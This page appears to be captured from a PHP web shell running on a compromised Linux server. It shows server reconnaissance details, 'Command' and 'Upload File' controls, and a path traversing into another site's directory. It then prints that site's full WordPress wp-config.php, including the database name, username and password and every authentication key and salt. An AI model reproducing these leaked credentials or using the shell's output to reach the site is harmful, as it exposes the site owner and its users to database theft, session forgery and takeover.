|
Server IP : 62.171.151.215 / Your IP : 216.73.217.19 Web Server : nginx/1.18.0 System : Linux vmi3128365 5.15.0-176-generic #186-Ubuntu SMP Fri Mar 13 11:01:42 UTC 2026 x86_64 User : alex ( 1000) PHP Version : 8.4.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/workoutfacile.com/../comment-devenir-developpeur.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'cddwow2026' );
/** Database username */
define( 'DB_USER', 'cddwow2026' );
/** Database password */
define( 'DB_PASSWORD', 'suYwXOSW5BkABPxstPUie87vuX118Yz6AZZ2RV6TUWq8' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '9063cd58cea8ff084be69afef01b1494bc59daed809b24fc4c7eade34c76235353749accd716a512' );
define( 'SECURE_AUTH_KEY', 'f91cb3b21fc3c0e3d46b30a839c933c1c5095108a687b17c0185fe9f0e6aaa685819aef52c9e1035' );
define( 'LOGGED_IN_KEY', '363bc65da1d47b6ffbb40e3ae34d2d49affdd59d9407bfcd9cf89bc7aa396b975d57b3c2a073c0e0' );
define( 'NONCE_KEY', '0e18587417467bac5fcc85c34beec335030068c34b55e618db84d75094b60bcbba6f4d7d92f4699e' );
define( 'AUTH_SALT', 'abd66b53fea7cba658ea9315a1088edcfb59dfda5eb15585e5f3b2c414c54d2984803a00a25eb59a' );
define( 'SECURE_AUTH_SALT', 'f9825411566c8b6d4d7840c7d47803bd53ad1c7c420059541c19cb2d2b2a82a24f831a26cc00b916' );
define( 'LOGGED_IN_SALT', '6c99f5830be7c68b41f14539fc15bfe1b62c32d6157afef4ed94a6a386cd8462946e6e13c84aba5c' );
define( 'NONCE_SALT', 'b6edbfd4257fbfe9df492e2551fa8102e4a446b79e8b0d781f21a4c8bd8a996a5f5cd3c8aecd0e04' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** Canonical URL enforced by clean-www */
define( 'WP_HOME', 'https://www.comment-devenir-developpeur.com' );
define( 'WP_SITEURL', 'https://www.comment-devenir-developpeur.com' );
/** Forge-like defaults */
define("FS_METHOD", "direct");